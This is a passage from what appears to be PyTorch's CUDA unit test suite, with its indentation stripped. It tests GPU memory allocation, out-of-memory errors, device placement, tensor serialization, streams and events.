gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will hit OOM when trying to allocate more than half of the memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes a 0.1-second spin onto the stream so that, if the copy is non-blocking,
# the stream will almost surely still be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of the parent and child thread execution times is greater than the
# real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For a reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
